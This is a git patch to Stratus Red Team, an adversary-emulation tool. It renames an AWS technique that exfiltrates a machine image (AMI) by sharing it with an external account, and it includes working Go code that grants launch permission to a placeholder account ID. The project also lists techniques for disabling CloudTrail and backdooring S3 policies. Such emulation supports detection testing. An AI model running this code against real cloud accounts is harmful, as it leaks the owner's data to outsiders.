From cddbb98fef13dbc45e968e91272de82bb2266c4c Mon Sep 17 00:00:00 2001 From: Christophe Tafani-Dereeper Date: Wed, 19 Jan 2022 21:37:05 +0100 Subject: [PATCH] Rename attack technique for AMI exfiltration (public sharing to sharing with external account) --- .../AWS/aws.exfiltration.ami-sharing.md | 24 +++++++++++++++++++ docs/attack-techniques/AWS/index.md | 2 +- docs/attack-techniques/list.md | 2 +- .../{ami-make-public => ami-sharing}/main.go | 18 +++++++------- .../{ami-make-public => ami-sharing}/main.tf | 0 internal/attacktechniques/main.go | 2 +- 6 files changed, 36 insertions(+), 12 deletions(-) create mode 100755 docs/attack-techniques/AWS/aws.exfiltration.ami-sharing.md rename internal/attacktechniques/aws/exfiltration/{ami-make-public => ami-sharing}/main.go (77%) rename internal/attacktechniques/aws/exfiltration/{ami-make-public => ami-sharing}/main.tf (100%) diff --git a/docs/attack-techniques/AWS/aws.exfiltration.ami-sharing.md b/docs/attack-techniques/AWS/aws.exfiltration.ami-sharing.md new file mode 100755 index 00000000..6fd7dcf8 --- /dev/null +++ b/docs/attack-techniques/AWS/aws.exfiltration.ami-sharing.md @@ -0,0 +1,24 @@ +# Exfiltrate an AMI by AMI Sharing + +Platform: AWS + +## MITRE ATT&CK Tactics + + +- Exfiltration + +## Description + + +Exfiltrates an AMI by sharing it with an external AWS account. + +Warm-up: Create an AMI. + +Detonation: Share the AMI. + + +## Instructions + +```bash title="Detonate with Stratus Red Team" +stratus detonate aws.exfiltration.ami-sharing +``` \ No newline at end of file diff --git a/docs/attack-techniques/AWS/index.md b/docs/attack-techniques/AWS/index.md index e8c46084..e8bd65e4 100755 --- a/docs/attack-techniques/AWS/index.md +++ b/docs/attack-techniques/AWS/index.md @@ -25,7 +25,7 @@ Note that some Stratus attack techniques may correspond to more than a single AT ## Exfiltration -- [Exfiltrate an AMI by Making it Public](./aws.exfiltration.ami-make-public.md) +- [Exfiltrate an AMI by AMI Sharing](./aws.exfiltration.ami-sharing.md) - [Exfiltrate EBS Snapshot through snapshot sharing](./aws.exfiltration.ebs-snapshot-shared-with-external-account.md) diff --git a/docs/attack-techniques/list.md b/docs/attack-techniques/list.md index 0e9df308..85b1f6aa 100755 --- a/docs/attack-techniques/list.md +++ b/docs/attack-techniques/list.md @@ -14,7 +14,7 @@ This page contains the list of all Stratus Attack Techniques. | [Stop a CloudTrail Trail](./AWS/aws.defense-evasion.stop-cloudtrail.md) | [AWS](./AWS/index.md) | Defense Evasion | | [Remove VPC flow logs](./AWS/aws.defense-evasion.remove-vpc-flow-logs.md) | [AWS](./AWS/index.md) | Defense Evasion | | [Execute discovery commands on an EC2 instance](./AWS/aws.discovery.basic-enumeration-from-ec2-instance.md) | [AWS](./AWS/index.md) | Discovery | -| [Exfiltrate an AMI by Making it Public](./AWS/aws.exfiltration.ami-make-public.md) | [AWS](./AWS/index.md) | Exfiltration | +| [Exfiltrate an AMI by AMI Sharing](./AWS/aws.exfiltration.ami-sharing.md) | [AWS](./AWS/index.md) | Exfiltration | | [Exfiltrate EBS Snapshot through snapshot sharing](./AWS/aws.exfiltration.ebs-snapshot-shared-with-external-account.md) | [AWS](./AWS/index.md) | Exfiltration | | [Backdoor an S3 Bucket via its Bucket Policy](./AWS/aws.exfiltration.backdoor-s3-bucket-policy.md) | [AWS](./AWS/index.md) | Exfiltration | | [Open Ingress Port 22 on a Security Group](./AWS/aws.exfiltration.open-port-22-ingress-on-security-group.md) | [AWS](./AWS/index.md) | Exfiltration | diff --git a/internal/attacktechniques/aws/exfiltration/ami-make-public/main.go b/internal/attacktechniques/aws/exfiltration/ami-sharing/main.go similarity index 77% rename from internal/attacktechniques/aws/exfiltration/ami-make-public/main.go rename to internal/attacktechniques/aws/exfiltration/ami-sharing/main.go index 9bfaaf4c..5ac0a4b4 100644 --- a/internal/attacktechniques/aws/exfiltration/ami-make-public/main.go +++ b/internal/attacktechniques/aws/exfiltration/ami-sharing/main.go @@ -18,14 +18,14 @@ var tf []byte func init() { stratus.GetRegistry().RegisterAttackTechnique(&stratus.AttackTechnique{ - ID: "aws.exfiltration.ami-make-public", - FriendlyName: "Exfiltrate an AMI by Making it Public", + ID: "aws.exfiltration.ami-sharing", + FriendlyName: "Exfiltrate an AMI by AMI Sharing", Description: ` -Exfiltrates an AMI by sharing it publicly. +Exfiltrates an AMI by sharing it with an external AWS account. Warm-up: Create an AMI. -Detonation: Share the AMI publicly. +Detonation: Share the AMI. `, Platform: stratus.AWS, MitreAttackTactics: []mitreattack.Tactic{mitreattack.Exfiltration}, @@ -36,14 +36,14 @@ Detonation: Share the AMI publicly. } var amiPublicPermissions = []types.LaunchPermission{ - {Group: types.PermissionGroupAll}, + {UserId: aws.String("012345678901")}, } func detonate(params map[string]string) error { ec2Client := ec2.NewFromConfig(providers.AWS().GetConnection()) amiId := params["ami_id"] - log.Println("Exfiltrating AMI " + amiId + " by sharing it publicly") + log.Println("Exfiltrating AMI " + amiId + " by sharing it with an external AWS account") _, err := ec2Client.ModifyImageAttribute(context.Background(), &ec2.ModifyImageAttributeInput{ ImageId: aws.String(amiId), LaunchPermission: &types.LaunchPermissionModifications{ @@ -52,7 +52,7 @@ func detonate(params map[string]string) error { }) if err != nil { - return errors.New("Unable to share AMI publicly: " + err.Error()) + return errors.New("Unable to share AMI with external AWS account: " + err.Error()) } return nil @@ -62,7 +62,7 @@ func revert(params map[string]string) error { ec2Client := ec2.NewFromConfig(providers.AWS().GetConnection()) amiId := params["ami_id"] - log.Println("Reverting exfiltration of AMI " + amiId + " by removing public sharing") + log.Println("Reverting exfiltration of AMI " + amiId + " by removing cross-account sharing") _, err := ec2Client.ModifyImageAttribute(context.Background(), &ec2.ModifyImageAttributeInput{ ImageId: aws.String(amiId), LaunchPermission: &types.LaunchPermissionModifications{ @@ -71,7 +71,7 @@ func revert(params map[string]string) error { }) if err != nil { - return errors.New("Unable to remove AMI public permissions: " + err.Error()) + return errors.New("Unable to remove AMI permissions: " + err.Error()) } return nil diff --git a/internal/attacktechniques/aws/exfiltration/ami-make-public/main.tf b/internal/attacktechniques/aws/exfiltration/ami-sharing/main.tf similarity index 100% rename from internal/attacktechniques/aws/exfiltration/ami-make-public/main.tf rename to internal/attacktechniques/aws/exfiltration/ami-sharing/main.tf diff --git a/internal/attacktechniques/main.go b/internal/attacktechniques/main.go index da0d8b5e..0517d90b 100644 --- a/internal/attacktechniques/main.go +++ b/internal/attacktechniques/main.go @@ -6,7 +6,7 @@ import ( _ "github.com/datadog/stratus-red-team/internal/attacktechniques/aws/defense-evasion/disable-cloudtrail" _ "github.com/datadog/stratus-red-team/internal/attacktechniques/aws/defense-evasion/remove-vpc-flow-logs" _ "github.com/datadog/stratus-red-team/internal/attacktechniques/aws/discovery/discovery-commands-ec2-instance-role" - _ "github.com/datadog/stratus-red-team/internal/attacktechniques/aws/exfiltration/ami-make-public" + _ "github.com/datadog/stratus-red-team/internal/attacktechniques/aws/exfiltration/ami-sharing" _ "github.com/datadog/stratus-red-team/internal/attacktechniques/aws/exfiltration/ebs-snapshot-share" _ "github.com/datadog/stratus-red-team/internal/attacktechniques/aws/exfiltration/s3-bucket-backdoor-bucket-policy" _ "github.com/datadog/stratus-red-team/internal/attacktechniques/aws/exfiltration/securitygroup-open-port-22-to-internet"